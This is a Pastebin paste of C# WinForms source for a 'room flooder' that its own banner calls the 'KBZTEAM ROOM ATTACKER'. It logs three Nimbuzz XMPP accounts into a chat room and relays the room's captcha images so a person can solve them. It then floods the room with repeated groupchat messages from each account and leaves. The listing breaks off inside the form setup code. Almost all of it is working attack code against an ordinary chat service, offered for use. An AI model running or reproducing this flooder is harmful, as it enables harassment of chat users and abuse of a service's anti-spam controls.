Advertisement
Guest User

balu room flooder

a guest
Sep 16th, 2015
99
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 56.77 KB | None | 0 0
  1. using agsXMPP;
  2. using agsXMPP.protocol.client;
  3. using agsXMPP.Xml.Dom;
  4. using System;
  5. using System.ComponentModel;
  6. using System.Diagnostics;
  7. using System.Drawing;
  8. using System.Windows.Forms;
  9.  
  10. namespace singleidcaptcha
  11. {
  12. public class Form1 : Form
  13. {
  14. private XmppClientConnection romy;
  15.  
  16. private XmppClientConnection tofy;
  17.  
  18. private XmppClientConnection balu;
  19.  
  20. private Random random = new Random();
  21.  
  22. private IContainer components = null;
  23.  
  24. private Button button1;
  25.  
  26. private Button button2;
  27.  
  28. private Button button3;
  29.  
  30. private Button button4;
  31.  
  32. private PictureBox pictureBox1;
  33.  
  34. private TextBox textBox1;
  35.  
  36. private TextBox textBox3;
  37.  
  38. private PictureBox pictureBox2;
  39.  
  40. private Label label1;
  41.  
  42. private Label label2;
  43.  
  44. private GroupBox groupBox1;
  45.  
  46. private Label label3;
  47.  
  48. private LinkLabel linkLabel1;
  49.  
  50. private GroupBox groupBox2;
  51.  
  52. private Button button6;
  53.  
  54. private TextBox textBox4;
  55.  
  56. private GroupBox groupBox3;
  57.  
  58. private TextBox username;
  59.  
  60. private TextBox password;
  61.  
  62. private GroupBox groupBox4;
  63.  
  64. private TextBox textBox13;
  65.  
  66. private TextBox textBox12;
  67.  
  68. private TextBox textBox11;
  69.  
  70. private TextBox textBox10;
  71.  
  72. private TextBox textBox9;
  73.  
  74. private TextBox textBox8;
  75.  
  76. private TextBox textBox7;
  77.  
  78. private TextBox textBox6;
  79.  
  80. private GroupBox groupBox5;
  81.  
  82. private TextBox textBox14;
  83.  
  84. private TextBox textBox15;
  85.  
  86. private TextBox textBox16;
  87.  
  88. private TextBox textBox17;
  89.  
  90. private TextBox textBox18;
  91.  
  92. private TextBox textBox19;
  93.  
  94. private TextBox textBox20;
  95.  
  96. private TextBox textBox21;
  97.  
  98. private GroupBox groupBox6;
  99.  
  100. private TextBox roomname;
  101.  
  102. private GroupBox groupBox7;
  103.  
  104. private GroupBox groupBox8;
  105.  
  106. private TextBox captcha;
  107.  
  108. private NumericUpDown numericUpDown1;
  109.  
  110. private Label label5;
  111.  
  112. private TextBox textBox2;
  113.  
  114. private GroupBox groupBox9;
  115.  
  116. private Label label9;
  117.  
  118. private TextBox textBox5;
  119.  
  120. private TextBox textBox22;
  121.  
  122. private PictureBox pictureBox3;
  123.  
  124. private TabControl tabControl1;
  125.  
  126. private TabPage tabPage1;
  127.  
  128. private TabPage tabPage2;
  129.  
  130. private Label label11;
  131.  
  132. private Label label10;
  133.  
  134. private TabPage tabPage3;
  135.  
  136. private Label label14;
  137.  
  138. private GroupBox groupBox10;
  139.  
  140. private Label label13;
  141.  
  142. private Label label12;
  143.  
  144. private PictureBox pictureBox4;
  145.  
  146. public Form1()
  147. {
  148. this.InitializeComponent();
  149. }
  150.  
  151. private void button1_Click(object sender, EventArgs e)
  152. {
  153. this.romy = new XmppClientConnection
  154. {
  155. Server = "nimbuzz.com",
  156. ConnectServer = "o.nimbuzz.com",
  157. Port = 5222
  158. };
  159. this.romy.Open(this.username.Text, this.password.Text, "Nimbuzz_Symbian" + this.random.Next(0, 999999));
  160. this.romy.OnLogin += new ObjectHandler(this.Login);
  161. this.romy.OnAuthError += new XmppElementHandler(this.failed);
  162. this.romy.OnClose += new ObjectHandler(this.dc);
  163. this.romy.OnMessage += new MessageHandler(this.OnMessage);
  164. Random random = new Random();
  165. this.tofy = new XmppClientConnection
  166. {
  167. Server = "nimbuzz.com",
  168. ConnectServer = "o.nimbuzz.com",
  169. Port = 5222
  170. };
  171. this.tofy.Open(this.textBox1.Text, this.password.Text, "Nimbuzz_Symbian" + random.Next(0, 999999));
  172. this.tofy.OnLogin += new ObjectHandler(this.Login2);
  173. this.tofy.OnAuthError += new XmppElementHandler(this.failed2);
  174. this.tofy.OnClose += new ObjectHandler(this.dc2);
  175. this.tofy.OnMessage += new MessageHandler(this.OnMessage2);
  176. Random random2 = new Random();
  177. this.balu = new XmppClientConnection
  178. {
  179. Server = "nimbuzz.com",
  180. ConnectServer = "o.nimbuzz.com",
  181. Port = 5222
  182. };
  183. this.balu.Open(this.textBox5.Text, this.password.Text, "Nimbuzz_Symbian" + random2.Next(0, 999999));
  184. this.balu.OnLogin += new ObjectHandler(this.Login3);
  185. this.balu.OnAuthError += new XmppElementHandler(this.failed3);
  186. this.balu.OnClose += new ObjectHandler(this.dc3);
  187. this.balu.OnMessage += new MessageHandler(this.OnMessage3);
  188. }
  189.  
  190. private void Login(object sender)
  191. {
  192. if (base.InvokeRequired)
  193. {
  194. base.BeginInvoke(new ObjectHandler(this.Login), new object[]
  195. {
  196. sender
  197. });
  198. }
  199. else
  200. {
  201. this.username.BackColor = Color.Green;
  202. }
  203. }
  204.  
  205. private void failed(object sender, Element e)
  206. {
  207. if (base.InvokeRequired)
  208. {
  209. base.BeginInvoke(new XmppElementHandler(this.failed), new object[]
  210. {
  211. sender,
  212. e
  213. });
  214. }
  215. else
  216. {
  217. this.username.BackColor = Color.Red;
  218. }
  219. }
  220.  
  221. private void dc(object sender)
  222. {
  223. if (base.InvokeRequired)
  224. {
  225. base.BeginInvoke(new ObjectHandler(this.dc), new object[]
  226. {
  227. sender
  228. });
  229. }
  230. else
  231. {
  232. this.username.BackColor = Color.Yellow;
  233. }
  234. }
  235.  
  236. private void OnMessage(object sender, agsXMPP.protocol.client.Message msg)
  237. {
  238. if (base.InvokeRequired)
  239. {
  240. base.BeginInvoke(new MessageHandler(this.OnMessage), new object[]
  241. {
  242. sender,
  243. msg
  244. });
  245. }
  246. else if (msg.Type == MessageType.groupchat)
  247. {
  248. if (msg.From.Resource == "admin")
  249. {
  250. this.pictureBox1.Load(msg.Body.Replace("Enter the right answer to start chatting. ", ""));
  251. }
  252. }
  253. }
  254.  
  255. private void Login2(object sender)
  256. {
  257. if (base.InvokeRequired)
  258. {
  259. base.BeginInvoke(new ObjectHandler(this.Login2), new object[]
  260. {
  261. sender
  262. });
  263. }
  264. else
  265. {
  266. this.textBox1.BackColor = Color.Green;
  267. }
  268. }
  269.  
  270. private void failed2(object sender, Element e)
  271. {
  272. if (base.InvokeRequired)
  273. {
  274. base.BeginInvoke(new XmppElementHandler(this.failed2), new object[]
  275. {
  276. sender,
  277. e
  278. });
  279. }
  280. else
  281. {
  282. this.textBox1.BackColor = Color.Red;
  283. this.password.BackColor = Color.Red;
  284. }
  285. }
  286.  
  287. private void dc2(object sender)
  288. {
  289. if (base.InvokeRequired)
  290. {
  291. base.BeginInvoke(new ObjectHandler(this.dc2), new object[]
  292. {
  293. sender
  294. });
  295. }
  296. else
  297. {
  298. this.textBox1.ForeColor = Color.Yellow;
  299. }
  300. }
  301.  
  302. private void OnMessage2(object sender, agsXMPP.protocol.client.Message msg)
  303. {
  304. if (base.InvokeRequired)
  305. {
  306. base.BeginInvoke(new MessageHandler(this.OnMessage2), new object[]
  307. {
  308. sender,
  309. msg
  310. });
  311. }
  312. else if (msg.Type == MessageType.groupchat)
  313. {
  314. if (msg.From.Resource == "admin")
  315. {
  316. this.pictureBox2.Load(msg.Body.Replace("Enter the right answer to start chatting. ", ""));
  317. }
  318. }
  319. }
  320.  
  321. private void Login3(object sender)
  322. {
  323. if (base.InvokeRequired)
  324. {
  325. base.BeginInvoke(new ObjectHandler(this.Login3), new object[]
  326. {
  327. sender
  328. });
  329. }
  330. else
  331. {
  332. this.textBox5.BackColor = Color.Green;
  333. }
  334. }
  335.  
  336. private void failed3(object sender, Element e)
  337. {
  338. if (base.InvokeRequired)
  339. {
  340. base.BeginInvoke(new XmppElementHandler(this.failed3), new object[]
  341. {
  342. sender,
  343. e
  344. });
  345. }
  346. else
  347. {
  348. this.textBox5.BackColor = Color.Red;
  349. this.password.BackColor = Color.Red;
  350. }
  351. }
  352.  
  353. private void dc3(object sender)
  354. {
  355. if (base.InvokeRequired)
  356. {
  357. base.BeginInvoke(new ObjectHandler(this.dc3), new object[]
  358. {
  359. sender
  360. });
  361. }
  362. else
  363. {
  364. this.textBox5.ForeColor = Color.Yellow;
  365. }
  366. }
  367.  
  368. private void OnMessage3(object sender, agsXMPP.protocol.client.Message msg)
  369. {
  370. if (base.InvokeRequired)
  371. {
  372. base.BeginInvoke(new MessageHandler(this.OnMessage3), new object[]
  373. {
  374. sender,
  375. msg
  376. });
  377. }
  378. else if (msg.Type == MessageType.groupchat)
  379. {
  380. if (msg.From.Resource == "admin")
  381. {
  382. this.pictureBox3.Load(msg.Body.Replace("Enter the right answer to start chatting. ", ""));
  383. }
  384. }
  385. }
  386.  
  387. private void button3_Click(object sender, EventArgs e)
  388. {
  389. this.romy.Send(string.Concat(new string[]
  390. {
  391. "<presence to='",
  392. this.roomname.Text,
  393. "@conference.nimbuzz.com/",
  394. this.username.Text,
  395. "'></presence>"
  396. }));
  397. this.tofy.Send(string.Concat(new string[]
  398. {
  399. "<presence to='",
  400. this.roomname.Text,
  401. "@conference.nimbuzz.com/",
  402. this.textBox1.Text,
  403. "'></presence>"
  404. }));
  405. this.balu.Send(string.Concat(new string[]
  406. {
  407. "<presence to='",
  408. this.roomname.Text,
  409. "@conference.nimbuzz.com/",
  410. this.textBox5.Text,
  411. "'></presence>"
  412. }));
  413. }
  414.  
  415. private void button4_Click(object sender, EventArgs e)
  416. {
  417. this.romy.Send(string.Concat(new string[]
  418. {
  419. "<message to='",
  420. this.roomname.Text,
  421. "@conference.nimbuzz.com' type='groupchat'><body>",
  422. this.captcha.Text,
  423. "</body></message>'"
  424. }));
  425. this.tofy.Send(string.Concat(new string[]
  426. {
  427. "<message to='",
  428. this.roomname.Text,
  429. "@conference.nimbuzz.com' type='groupchat'><body>",
  430. this.textBox3.Text,
  431. "</body></message>'"
  432. }));
  433. this.balu.Send(string.Concat(new string[]
  434. {
  435. "<message to='",
  436. this.roomname.Text,
  437. "@conference.nimbuzz.com' type='groupchat'><body>",
  438. this.textBox22.Text,
  439. "</body></message>'"
  440. }));
  441. for (int i = 1; i <= 2; i++)
  442. {
  443. this.romy.Send(string.Concat(new string[]
  444. {
  445. "<message to='",
  446. this.roomname.Text,
  447. "@conference.nimbuzz.com' type='groupchat'><body>",
  448. this.textBox6.Text,
  449. "</body></message>'"
  450. }));
  451. this.romy.Send(string.Concat(new string[]
  452. {
  453. "<message to='",
  454. this.roomname.Text,
  455. "@conference.nimbuzz.com' type='groupchat'><body>",
  456. this.textBox7.Text,
  457. "</body></message>'"
  458. }));
  459. this.romy.Send(string.Concat(new string[]
  460. {
  461. "<message to='",
  462. this.roomname.Text,
  463. "@conference.nimbuzz.com' type='groupchat'><body>",
  464. this.textBox8.Text,
  465. "</body></message>'"
  466. }));
  467. this.romy.Send(string.Concat(new string[]
  468. {
  469. "<message to='",
  470. this.roomname.Text,
  471. "@conference.nimbuzz.com' type='groupchat'><body>",
  472. this.textBox9.Text,
  473. "</body></message>'"
  474. }));
  475. this.romy.Send(string.Concat(new string[]
  476. {
  477. "<message to='",
  478. this.roomname.Text,
  479. "@conference.nimbuzz.com' type='groupchat'><body>",
  480. this.textBox10.Text,
  481. "</body></message>'"
  482. }));
  483. this.romy.Send(string.Concat(new string[]
  484. {
  485. "<message to='",
  486. this.roomname.Text,
  487. "@conference.nimbuzz.com' type='groupchat'><body>",
  488. this.textBox11.Text,
  489. "</body></message>'"
  490. }));
  491. this.romy.Send(string.Concat(new string[]
  492. {
  493. "<message to='",
  494. this.roomname.Text,
  495. "@conference.nimbuzz.com' type='groupchat'><body>",
  496. this.textBox12.Text,
  497. "</body></message>'"
  498. }));
  499. this.romy.Send(string.Concat(new string[]
  500. {
  501. "<message to='",
  502. this.roomname.Text,
  503. "@conference.nimbuzz.com' type='groupchat'><body>",
  504. this.textBox13.Text,
  505. "</body></message>'"
  506. }));
  507. this.romy.Send(string.Concat(new string[]
  508. {
  509. "<message to='",
  510. this.roomname.Text,
  511. "@conference.nimbuzz.com' type='groupchat'><body>",
  512. this.textBox6.Text,
  513. "</body></message>'"
  514. }));
  515. this.romy.Send(string.Concat(new string[]
  516. {
  517. "<message to='",
  518. this.roomname.Text,
  519. "@conference.nimbuzz.com' type='groupchat'><body>",
  520. this.textBox7.Text,
  521. "</body></message>'"
  522. }));
  523. this.romy.Send(string.Concat(new string[]
  524. {
  525. "<message to='",
  526. this.roomname.Text,
  527. "@conference.nimbuzz.com' type='groupchat'><body>",
  528. this.textBox8.Text,
  529. "</body></message>'"
  530. }));
  531. this.romy.Send(string.Concat(new string[]
  532. {
  533. "<message to='",
  534. this.roomname.Text,
  535. "@conference.nimbuzz.com' type='groupchat'><body>",
  536. this.textBox9.Text,
  537. "</body></message>'"
  538. }));
  539. this.romy.Send(string.Concat(new string[]
  540. {
  541. "<message to='",
  542. this.roomname.Text,
  543. "@conference.nimbuzz.com' type='groupchat'><body>",
  544. this.textBox10.Text,
  545. "</body></message>'"
  546. }));
  547. this.romy.Send(string.Concat(new string[]
  548. {
  549. "<message to='",
  550. this.roomname.Text,
  551. "@conference.nimbuzz.com' type='groupchat'><body>",
  552. this.textBox11.Text,
  553. "</body></message>'"
  554. }));
  555. this.romy.Send(string.Concat(new string[]
  556. {
  557. "<message to='",
  558. this.roomname.Text,
  559. "@conference.nimbuzz.com' type='groupchat'><body>",
  560. this.textBox12.Text,
  561. "</body></message>'"
  562. }));
  563. this.romy.Send(string.Concat(new string[]
  564. {
  565. "<message to='",
  566. this.roomname.Text,
  567. "@conference.nimbuzz.com' type='groupchat'><body>",
  568. this.textBox13.Text,
  569. "</body></message>'"
  570. }));
  571. this.romy.Send(string.Concat(new string[]
  572. {
  573. "<message to='",
  574. this.roomname.Text,
  575. "@conference.nimbuzz.com' type='groupchat'><body>",
  576. this.textBox6.Text,
  577. "</body></message>'"
  578. }));
  579. this.romy.Send(string.Concat(new string[]
  580. {
  581. "<message to='",
  582. this.roomname.Text,
  583. "@conference.nimbuzz.com' type='groupchat'><body>",
  584. this.textBox7.Text,
  585. "</body></message>'"
  586. }));
  587. this.romy.Send(string.Concat(new string[]
  588. {
  589. "<message to='",
  590. this.roomname.Text,
  591. "@conference.nimbuzz.com' type='groupchat'><body>",
  592. this.textBox8.Text,
  593. "</body></message>'"
  594. }));
  595. this.romy.Send(string.Concat(new string[]
  596. {
  597. "<message to='",
  598. this.roomname.Text,
  599. "@conference.nimbuzz.com' type='groupchat'><body>",
  600. this.textBox9.Text,
  601. "</body></message>'"
  602. }));
  603. this.romy.Send(string.Concat(new string[]
  604. {
  605. "<message to='",
  606. this.roomname.Text,
  607. "@conference.nimbuzz.com' type='groupchat'><body>",
  608. this.textBox10.Text,
  609. "</body></message>'"
  610. }));
  611. this.romy.Send(string.Concat(new string[]
  612. {
  613. "<message to='",
  614. this.roomname.Text,
  615. "@conference.nimbuzz.com' type='groupchat'><body>",
  616. this.textBox11.Text,
  617. "</body></message>'"
  618. }));
  619. this.romy.Send(string.Concat(new string[]
  620. {
  621. "<message to='",
  622. this.roomname.Text,
  623. "@conference.nimbuzz.com' type='groupchat'><body>",
  624. this.textBox12.Text,
  625. "</body></message>'"
  626. }));
  627. this.romy.Send(string.Concat(new string[]
  628. {
  629. "<message to='",
  630. this.roomname.Text,
  631. "@conference.nimbuzz.com' type='groupchat'><body>",
  632. this.textBox13.Text,
  633. "</body></message>'"
  634. }));
  635. }
  636. this.romy.Send(string.Concat(new string[]
  637. {
  638. "<presence type='unavailable' to='",
  639. this.roomname.Text,
  640. "@conference.nimbuzz.com/",
  641. this.username.Text,
  642. "'></presence>"
  643. }));
  644. for (int j = 1; j <= 2; j++)
  645. {
  646. this.tofy.Send(string.Concat(new string[]
  647. {
  648. "<message to='",
  649. this.roomname.Text,
  650. "@conference.nimbuzz.com' type='groupchat'><body>",
  651. this.textBox14.Text,
  652. "</body></message>'"
  653. }));
  654. this.tofy.Send(string.Concat(new string[]
  655. {
  656. "<message to='",
  657. this.roomname.Text,
  658. "@conference.nimbuzz.com' type='groupchat'><body>",
  659. this.textBox15.Text,
  660. "</body></message>'"
  661. }));
  662. this.tofy.Send(string.Concat(new string[]
  663. {
  664. "<message to='",
  665. this.roomname.Text,
  666. "@conference.nimbuzz.com' type='groupchat'><body>",
  667. this.textBox16.Text,
  668. "</body></message>'"
  669. }));
  670. this.tofy.Send(string.Concat(new string[]
  671. {
  672. "<message to='",
  673. this.roomname.Text,
  674. "@conference.nimbuzz.com' type='groupchat'><body>",
  675. this.textBox17.Text,
  676. "</body></message>'"
  677. }));
  678. this.tofy.Send(string.Concat(new string[]
  679. {
  680. "<message to='",
  681. this.roomname.Text,
  682. "@conference.nimbuzz.com' type='groupchat'><body>",
  683. this.textBox18.Text,
  684. "</body></message>'"
  685. }));
  686. this.tofy.Send(string.Concat(new string[]
  687. {
  688. "<message to='",
  689. this.roomname.Text,
  690. "@conference.nimbuzz.com' type='groupchat'><body>",
  691. this.textBox19.Text,
  692. "</body></message>'"
  693. }));
  694. this.tofy.Send(string.Concat(new string[]
  695. {
  696. "<message to='",
  697. this.roomname.Text,
  698. "@conference.nimbuzz.com' type='groupchat'><body>",
  699. this.textBox20.Text,
  700. "</body></message>'"
  701. }));
  702. this.tofy.Send(string.Concat(new string[]
  703. {
  704. "<message to='",
  705. this.roomname.Text,
  706. "@conference.nimbuzz.com' type='groupchat'><body>",
  707. this.textBox21.Text,
  708. "</body></message>'"
  709. }));
  710. this.tofy.Send(string.Concat(new string[]
  711. {
  712. "<message to='",
  713. this.roomname.Text,
  714. "@conference.nimbuzz.com' type='groupchat'><body>",
  715. this.textBox14.Text,
  716. "</body></message>'"
  717. }));
  718. this.tofy.Send(string.Concat(new string[]
  719. {
  720. "<message to='",
  721. this.roomname.Text,
  722. "@conference.nimbuzz.com' type='groupchat'><body>",
  723. this.textBox15.Text,
  724. "</body></message>'"
  725. }));
  726. this.tofy.Send(string.Concat(new string[]
  727. {
  728. "<message to='",
  729. this.roomname.Text,
  730. "@conference.nimbuzz.com' type='groupchat'><body>",
  731. this.textBox16.Text,
  732. "</body></message>'"
  733. }));
  734. this.tofy.Send(string.Concat(new string[]
  735. {
  736. "<message to='",
  737. this.roomname.Text,
  738. "@conference.nimbuzz.com' type='groupchat'><body>",
  739. this.textBox17.Text,
  740. "</body></message>'"
  741. }));
  742. this.tofy.Send(string.Concat(new string[]
  743. {
  744. "<message to='",
  745. this.roomname.Text,
  746. "@conference.nimbuzz.com' type='groupchat'><body>",
  747. this.textBox18.Text,
  748. "</body></message>'"
  749. }));
  750. this.tofy.Send(string.Concat(new string[]
  751. {
  752. "<message to='",
  753. this.roomname.Text,
  754. "@conference.nimbuzz.com' type='groupchat'><body>",
  755. this.textBox19.Text,
  756. "</body></message>'"
  757. }));
  758. this.tofy.Send(string.Concat(new string[]
  759. {
  760. "<message to='",
  761. this.roomname.Text,
  762. "@conference.nimbuzz.com' type='groupchat'><body>",
  763. this.textBox20.Text,
  764. "</body></message>'"
  765. }));
  766. this.tofy.Send(string.Concat(new string[]
  767. {
  768. "<message to='",
  769. this.roomname.Text,
  770. "@conference.nimbuzz.com' type='groupchat'><body>",
  771. this.textBox21.Text,
  772. "</body></message>'"
  773. }));
  774. this.tofy.Send(string.Concat(new string[]
  775. {
  776. "<message to='",
  777. this.roomname.Text,
  778. "@conference.nimbuzz.com' type='groupchat'><body>",
  779. this.textBox14.Text,
  780. "</body></message>'"
  781. }));
  782. this.tofy.Send(string.Concat(new string[]
  783. {
  784. "<message to='",
  785. this.roomname.Text,
  786. "@conference.nimbuzz.com' type='groupchat'><body>",
  787. this.textBox15.Text,
  788. "</body></message>'"
  789. }));
  790. this.tofy.Send(string.Concat(new string[]
  791. {
  792. "<message to='",
  793. this.roomname.Text,
  794. "@conference.nimbuzz.com' type='groupchat'><body>",
  795. this.textBox16.Text,
  796. "</body></message>'"
  797. }));
  798. this.tofy.Send(string.Concat(new string[]
  799. {
  800. "<message to='",
  801. this.roomname.Text,
  802. "@conference.nimbuzz.com' type='groupchat'><body>",
  803. this.textBox17.Text,
  804. "</body></message>'"
  805. }));
  806. this.tofy.Send(string.Concat(new string[]
  807. {
  808. "<message to='",
  809. this.roomname.Text,
  810. "@conference.nimbuzz.com' type='groupchat'><body>",
  811. this.textBox18.Text,
  812. "</body></message>'"
  813. }));
  814. this.tofy.Send(string.Concat(new string[]
  815. {
  816. "<message to='",
  817. this.roomname.Text,
  818. "@conference.nimbuzz.com' type='groupchat'><body>",
  819. this.textBox19.Text,
  820. "</body></message>'"
  821. }));
  822. this.tofy.Send(string.Concat(new string[]
  823. {
  824. "<message to='",
  825. this.roomname.Text,
  826. "@conference.nimbuzz.com' type='groupchat'><body>",
  827. this.textBox20.Text,
  828. "</body></message>'"
  829. }));
  830. this.tofy.Send(string.Concat(new string[]
  831. {
  832. "<message to='",
  833. this.roomname.Text,
  834. "@conference.nimbuzz.com' type='groupchat'><body>",
  835. this.textBox21.Text,
  836. "</body></message>'"
  837. }));
  838. }
  839. this.tofy.Send(string.Concat(new string[]
  840. {
  841. "<presence type='unavailable' to='",
  842. this.roomname.Text,
  843. "@conference.nimbuzz.com/",
  844. this.textBox1.Text,
  845. "'></presence>"
  846. }));
  847. for (int j = 1; j <= 2; j++)
  848. {
  849. this.balu.Send(string.Concat(new string[]
  850. {
  851. "<message to='",
  852. this.roomname.Text,
  853. "@conference.nimbuzz.com' type='groupchat'><body>",
  854. this.textBox14.Text,
  855. "</body></message>'"
  856. }));
  857. this.balu.Send(string.Concat(new string[]
  858. {
  859. "<message to='",
  860. this.roomname.Text,
  861. "@conference.nimbuzz.com' type='groupchat'><body>",
  862. this.textBox15.Text,
  863. "</body></message>'"
  864. }));
  865. this.balu.Send(string.Concat(new string[]
  866. {
  867. "<message to='",
  868. this.roomname.Text,
  869. "@conference.nimbuzz.com' type='groupchat'><body>",
  870. this.textBox16.Text,
  871. "</body></message>'"
  872. }));
  873. this.balu.Send(string.Concat(new string[]
  874. {
  875. "<message to='",
  876. this.roomname.Text,
  877. "@conference.nimbuzz.com' type='groupchat'><body>",
  878. this.textBox17.Text,
  879. "</body></message>'"
  880. }));
  881. this.balu.Send(string.Concat(new string[]
  882. {
  883. "<message to='",
  884. this.roomname.Text,
  885. "@conference.nimbuzz.com' type='groupchat'><body>",
  886. this.textBox18.Text,
  887. "</body></message>'"
  888. }));
  889. this.balu.Send(string.Concat(new string[]
  890. {
  891. "<message to='",
  892. this.roomname.Text,
  893. "@conference.nimbuzz.com' type='groupchat'><body>",
  894. this.textBox19.Text,
  895. "</body></message>'"
  896. }));
  897. this.balu.Send(string.Concat(new string[]
  898. {
  899. "<message to='",
  900. this.roomname.Text,
  901. "@conference.nimbuzz.com' type='groupchat'><body>",
  902. this.textBox20.Text,
  903. "</body></message>'"
  904. }));
  905. this.balu.Send(string.Concat(new string[]
  906. {
  907. "<message to='",
  908. this.roomname.Text,
  909. "@conference.nimbuzz.com' type='groupchat'><body>",
  910. this.textBox21.Text,
  911. "</body></message>'"
  912. }));
  913. this.balu.Send(string.Concat(new string[]
  914. {
  915. "<message to='",
  916. this.roomname.Text,
  917. "@conference.nimbuzz.com' type='groupchat'><body>",
  918. this.textBox14.Text,
  919. "</body></message>'"
  920. }));
  921. this.balu.Send(string.Concat(new string[]
  922. {
  923. "<message to='",
  924. this.roomname.Text,
  925. "@conference.nimbuzz.com' type='groupchat'><body>",
  926. this.textBox15.Text,
  927. "</body></message>'"
  928. }));
  929. this.balu.Send(string.Concat(new string[]
  930. {
  931. "<message to='",
  932. this.roomname.Text,
  933. "@conference.nimbuzz.com' type='groupchat'><body>",
  934. this.textBox16.Text,
  935. "</body></message>'"
  936. }));
  937. this.balu.Send(string.Concat(new string[]
  938. {
  939. "<message to='",
  940. this.roomname.Text,
  941. "@conference.nimbuzz.com' type='groupchat'><body>",
  942. this.textBox17.Text,
  943. "</body></message>'"
  944. }));
  945. this.balu.Send(string.Concat(new string[]
  946. {
  947. "<message to='",
  948. this.roomname.Text,
  949. "@conference.nimbuzz.com' type='groupchat'><body>",
  950. this.textBox18.Text,
  951. "</body></message>'"
  952. }));
  953. this.balu.Send(string.Concat(new string[]
  954. {
  955. "<message to='",
  956. this.roomname.Text,
  957. "@conference.nimbuzz.com' type='groupchat'><body>",
  958. this.textBox19.Text,
  959. "</body></message>'"
  960. }));
  961. this.balu.Send(string.Concat(new string[]
  962. {
  963. "<message to='",
  964. this.roomname.Text,
  965. "@conference.nimbuzz.com' type='groupchat'><body>",
  966. this.textBox20.Text,
  967. "</body></message>'"
  968. }));
  969. this.balu.Send(string.Concat(new string[]
  970. {
  971. "<message to='",
  972. this.roomname.Text,
  973. "@conference.nimbuzz.com' type='groupchat'><body>",
  974. this.textBox21.Text,
  975. "</body></message>'"
  976. }));
  977. this.balu.Send(string.Concat(new string[]
  978. {
  979. "<message to='",
  980. this.roomname.Text,
  981. "@conference.nimbuzz.com' type='groupchat'><body>",
  982. this.textBox14.Text,
  983. "</body></message>'"
  984. }));
  985. this.balu.Send(string.Concat(new string[]
  986. {
  987. "<message to='",
  988. this.roomname.Text,
  989. "@conference.nimbuzz.com' type='groupchat'><body>",
  990. this.textBox15.Text,
  991. "</body></message>'"
  992. }));
  993. this.balu.Send(string.Concat(new string[]
  994. {
  995. "<message to='",
  996. this.roomname.Text,
  997. "@conference.nimbuzz.com' type='groupchat'><body>",
  998. this.textBox16.Text,
  999. "</body></message>'"
  1000. }));
  1001. this.balu.Send(string.Concat(new string[]
  1002. {
  1003. "<message to='",
  1004. this.roomname.Text,
  1005. "@conference.nimbuzz.com' type='groupchat'><body>",
  1006. this.textBox17.Text,
  1007. "</body></message>'"
  1008. }));
  1009. this.balu.Send(string.Concat(new string[]
  1010. {
  1011. "<message to='",
  1012. this.roomname.Text,
  1013. "@conference.nimbuzz.com' type='groupchat'><body>",
  1014. this.textBox18.Text,
  1015. "</body></message>'"
  1016. }));
  1017. this.balu.Send(string.Concat(new string[]
  1018. {
  1019. "<message to='",
  1020. this.roomname.Text,
  1021. "@conference.nimbuzz.com' type='groupchat'><body>",
  1022. this.textBox19.Text,
  1023. "</body></message>'"
  1024. }));
  1025. this.balu.Send(string.Concat(new string[]
  1026. {
  1027. "<message to='",
  1028. this.roomname.Text,
  1029. "@conference.nimbuzz.com' type='groupchat'><body>",
  1030. this.textBox20.Text,
  1031. "</body></message>'"
  1032. }));
  1033. this.balu.Send(string.Concat(new string[]
  1034. {
  1035. "<message to='",
  1036. this.roomname.Text,
  1037. "@conference.nimbuzz.com' type='groupchat'><body>",
  1038. this.textBox21.Text,
  1039. "</body></message>'"
  1040. }));
  1041. }
  1042. this.balu.Send(string.Concat(new string[]
  1043. {
  1044. "<presence type='unavailable' to='",
  1045. this.roomname.Text,
  1046. "@conference.nimbuzz.com/",
  1047. this.textBox5.Text,
  1048. "'></presence>"
  1049. }));
  1050. }
  1051.  
  1052. private void Form1_Load(object sender, EventArgs e)
  1053. {
  1054. Process.Start("http://www.kbzteam.forums1.net/");
  1055. MessageBox.Show("WELCOME TO KBZTEAM.\n\nKBZTEAM ROOM ATTACKER BY BALU@NIMBUZZ.COM\n\nHTTP://WWW.KBZTEAM.FORUMS1.NET", "KBZTEAM-BALU", MessageBoxButtons.OK, MessageBoxIcon.Asterisk);
  1056. }
  1057.  
  1058. private void button6_Click(object sender, EventArgs e)
  1059. {
  1060. string[] array = this.textBox4.Text.Split(new char[]
  1061. {
  1062. '#'
  1063. });
  1064. this.username.Text = array[0];
  1065. this.textBox1.Text = array[1];
  1066. this.textBox5.Text = array[2];
  1067. this.textBox4.Text = null;
  1068. for (int i = 3; i <= array.GetUpperBound(0); i++)
  1069. {
  1070. this.textBox4.Text = this.textBox4.Text + array[i] + "#";
  1071. }
  1072. }
  1073.  
  1074. private void button5_Click(object sender, EventArgs e)
  1075. {
  1076. base.Dispose();
  1077. }
  1078.  
  1079. private void label1_Click(object sender, EventArgs e)
  1080. {
  1081. }
  1082.  
  1083. private void button2_Click(object sender, EventArgs e)
  1084. {
  1085. this.tofy.Close();
  1086. this.romy.Close();
  1087. this.balu.Close();
  1088. }
  1089.  
  1090. private void textBox5_TextChanged(object sender, EventArgs e)
  1091. {
  1092. }
  1093.  
  1094. private void tabPage1_Click(object sender, EventArgs e)
  1095. {
  1096. }
  1097.  
  1098. private void numericUpDown1_ValueChanged(object sender, EventArgs e)
  1099. {
  1100. }
  1101.  
  1102. private void label2_Click(object sender, EventArgs e)
  1103. {
  1104. }
  1105.  
  1106. protected override void Dispose(bool disposing)
  1107. {
  1108. if (disposing && this.components != null)
  1109. {
  1110. this.components.Dispose();
  1111. }
  1112. base.Dispose(disposing);
  1113. }
  1114.  
  1115. private void InitializeComponent()
  1116. {
  1117. ComponentResourceManager componentResourceManager = new ComponentResourceManager(typeof(Form1));
  1118. this.button1 = new Button();
  1119. this.button2 = new Button();
  1120. this.button3 = new Button();
  1121. this.button4 = new Button();
  1122. this.textBox1 = new TextBox();
  1123. this.textBox3 = new TextBox();
  1124. this.label1 = new Label();
  1125. this.label2 = new Label();
  1126. this.pictureBox2 = new PictureBox();
  1127. this.pictureBox1 = new PictureBox();
  1128. this.groupBox1 = new GroupBox();
  1129. this.label3 = new Label();
  1130. this.linkLabel1 = new LinkLabel();
  1131. this.groupBox2 = new GroupBox();
  1132. this.button6 = new Button();
  1133. this.textBox4 = new TextBox();
  1134. this.groupBox3 = new GroupBox();
  1135. this.textBox5 = new TextBox();
  1136. this.username = new TextBox();
  1137. this.password = new TextBox();
  1138. this.groupBox4 = new GroupBox();
  1139. this.textBox13 = new TextBox();
  1140. this.textBox12 = new TextBox();
  1141. this.textBox11 = new TextBox();
